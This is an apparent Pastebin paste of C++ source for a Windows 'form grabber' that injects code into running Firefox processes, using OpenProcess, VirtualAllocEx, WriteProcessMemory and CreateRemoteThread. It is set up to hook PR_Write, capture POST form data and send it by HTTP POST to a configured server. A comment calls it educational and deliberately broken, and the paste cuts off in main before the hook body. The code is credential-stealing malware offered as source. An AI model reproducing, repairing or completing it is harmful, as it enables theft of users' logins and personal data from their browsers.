Guest User

Untitled

a guest
Oct 11th, 2013
454
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*Ok, so firstly I created this purely for educational reasons. To prevent any Feds attempting to have a early morning party v& dance this code will not work. (You could make it work by changing 4 lines)
  2.  
  3. If you get this working,use it maliciously and get arrested don't come crying to me.
  4.  
  5. Now that's out the way here is the form grabber. Blackhats commonly use scripts similar to this to "grab" details from websites you visit. It's a simple c++ script that can run on admin or lower rights accounts.
  6.  
  7.  
  8. Remember this script is BROKEN. Firefox "patched" this method.*/
  9.  
  10. #include <stdio.h>
  11. #include <windows.h>
  12. #include <string.h>
  13. #include <Tlhelp32.h>
  14. #include <wininet.h>
  15. #include <tchar.h>
  16. #define HTTP_PORT 80
  17. #define HTTP_POST "POST"
  18. #define HTTP_POST_HEADER "Content-Type:application/x-www-form-urlencoded"
  19. #define HTTP_REMOTE_SITE "localhost"
  20. #define HTTP_REMOTE_PAGE "/postDemo.php"
  21. #define FIREFOX_PROCESS TEXT("firefox.exe")
  22. #define FIREFOX_PR_WRITE "PR_Write"
  23. #define NSPR4_DLL "nspr4.dll"
  24. #define WININET_DLL "wininet.dll"
  25. #define KERNEL32_DLL "kernel32.dll"
  26. #define HOOK_CODE_SIZE 2000
  27. #define HOOK_ESP_DATA_OFFSET 0x08
  28. #define HOOK_ESP_DATA_SIZE 0x0C
  29. #define HOOK_ESP_ARG_0 0x04
  30. #define HOOK_POST_CMP 0x54534F50 // = TSOP (POST)
  31. #define HOOK_JMP 0xE9 // Jump near, relative, displacement relative to next instruction
  32. #define HOOK_INT3 0xCC
  33. #define HOOK_JMP_INST_SIZE 0x01
  34. #define HOOK_INT3_SIZE 0x01
  35. #define HOOK_ADDRESS_SIZE_32 0x04
  36. #define HOOK_ADDRESS_SIZE_64 0x08
  37. #define HOOK_REL_JMP_OFFSET_32 (HOOK_JMP_INST_SIZE + HOOK_ADDRESS_SIZE_32) // 5
  38. #define HOOK_REL_JMP_OFFSET_64 (HOOK_JMP_INST_SIZE + HOOK_ADDRESS_SIZE_64) // 9
  39. #define HOOK_PARAM1_OFFSET_32 0x08
  40. #define HOOK_LOCALVAR1_OFFSET_32 0x04 // Should be
  41. #define PR_WRITE_JMP_VP_SIZE 0x06 // 0x0A for 64 bits
  42. typedef HMODULE (WINAPI *FnGetModuleHandle) (LPCTSTR);
  43. typedef FARPROC (WINAPI *FnGetProcAddress) (HMODULE,LPCSTR);
  44. typedef int (WINAPI *FnVirtualProtect) (LPVOID,SIZE_T,DWORD,PDWORD);
  45. typedef HINTERNET (WINAPI *FnInternetOpen) (LPCTSTR,DWORD,LPCTSTR,LPCTSTR,DWORD);
  46. typedef HINTERNET (WINAPI *FnInternetConnect)(HINTERNET,LPCTSTR,INTERNET_PORT,LPCTSTR,LPCTSTR,DWORD,DWORD,DWORD_PTR);
  47. typedef HINTERNET (WINAPI *FnHttpOpenRequest) (HINTERNET,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR*,DWORD,DWORD_PTR);
  48. typedef BOOL (WINAPI *FnHttpSendRequest)(HINTERNET,LPCTSTR,DWORD,LPVOID,DWORD);
  49. typedef VOID (WINAPI *FnSleep)(DWORD);
  50. typedef struct {
  51. FnGetModuleHandle fnGetModuleHandle; // GetModuleHandle
  52. FnGetProcAddress fnGetProcAddress; // GetProcAddress
  53. FnVirtualProtect fnVirtualProtect; // VirtualProtect
  54. FnSleep fnSleep; // Sleep
  55. char nameNspr4[36]; // "nspr4.dll"
  56. char namePR_Write[36]; // "PR_Write"
  57. BYTE *PR_Write;
  58. BYTE *nptr;
  59. DWORD *bptr;
  60. DWORD oldProtectValue;
  61. char blank[3]; // ""
  62. char remoteSite[16]; // "localhost"
  63. char post[10]; // "POST"
  64. char pageName[16]; // "/visit.php"
  65. char header[64]; // "Content-Type:application/x-www-form-urlencoded"
  66. HINTERNET fnOpenHandle;
  67. HINTERNET fnConnectHandle;
  68. HINTERNET internetHandle;
  69. int postDataLength;
  70. char *pPostData;
  71. FnInternetOpen fnInternetOpen;
  72. FnInternetConnect fnInternetConnect;
  73. FnHttpOpenRequest fnHttpOpenRequest;
  74. FnHttpSendRequest fnHttpSendRequest;
  75. int addressSize; // 4, or 8 on 64 bit CPUs
  76. } InjectData;
  77. void Hook(InjectData *pData);
  78. int main() {
  79. InjectData data;
  80. LPVOID pRemoteProgram, pRemoteMemory;
  81. HANDLE rThread;
  82. HMODULE kernel32;
  83. HMODULE wininet;
  84. HANDLE handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
  85. PROCESSENTRY32 ProcessInfo;
  86. ProcessInfo.dwSize = sizeof(PROCESSENTRY32);
  87. LoadLibraryA( WININET_DLL );
  88. wininet = GetModuleHandleA( WININET_DLL );
  89. kernel32 = GetModuleHandleA( KERNEL32_DLL );
  90. data.fnGetModuleHandle = (FnGetModuleHandle) GetProcAddress( kernel32,"GetModuleHandleA" );
  91. data.fnGetProcAddress = (FnGetProcAddress) GetProcAddress( kernel32, "GetProcAddress" );
  92. data.fnVirtualProtect = (FnVirtualProtect) GetProcAddress( kernel32, "VirtualProtect" );
  93. data.fnSleep = (FnSleep) GetProcAddress( kernel32, "Sleep" );
  94. data.fnInternetOpen = (FnInternetOpen) GetProcAddress( wininet, "InternetOpenA" );
  95. data.fnInternetConnect = (FnInternetConnect) GetProcAddress( wininet, "InternetConnectA" );
  96. data.fnHttpOpenRequest = (FnHttpOpenRequest) GetProcAddress( wininet, "HttpOpenRequestA" );
  97. data.fnHttpSendRequest = (FnHttpSendRequest) GetProcAddress( wininet, "HttpSendRequestA" );
  98. strcpy( data.nameNspr4, NSPR4_DLL );
  99. strcpy( data.namePR_Write, FIREFOX_PR_WRITE );
  100. strcpy( data.remoteSite, HTTP_REMOTE_SITE );
  101. strcpy( data.post, HTTP_POST );
  102. strcpy( data.pageName, HTTP_REMOTE_PAGE);
  103. strcpy( data.header, HTTP_POST_HEADER );
  104. strcpy( data.blank, "");
  105. data.addressSize = sizeof( BYTE * ); // size of a pointer
  106. while(Process32Next(handle, &ProcessInfo))
  107. {
  108. // strcmp on ANSI, wcscmp on UNICODE
  109. if(! _tcscmp(ProcessInfo.szExeFile, FIREFOX_PROCESS))
  110. {
  111. HANDLE firefoxHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, ProcessInfo.th32ProcessID);
  112. pRemoteMemory = VirtualAllocEx( firefoxHandle, NULL, sizeof(data), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
  113. WriteProcessMemory(firefoxHandle, pRemoteMemory, &data, sizeof(data), NULL);
  114. pRemoteProgram = VirtualAllocEx( firefoxHandle, NULL, HOOK_CODE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
  115. WriteProcessMemory(firefoxHandle, pRemoteProgram, Hook, HOOK_CODE_SIZE, NULL);
  116. rThread = CreateRemoteThread( firefoxHandle, NULL, 0, (LPTHREAD_START_ROUTINE) pRemoteProgram, pRemoteMemory, 0 ,NULL);
  117. WaitForSingleObject( rThread, INFINITE);
  118. CloseHandle(firefoxHandle);
  119. }
RAW Paste Data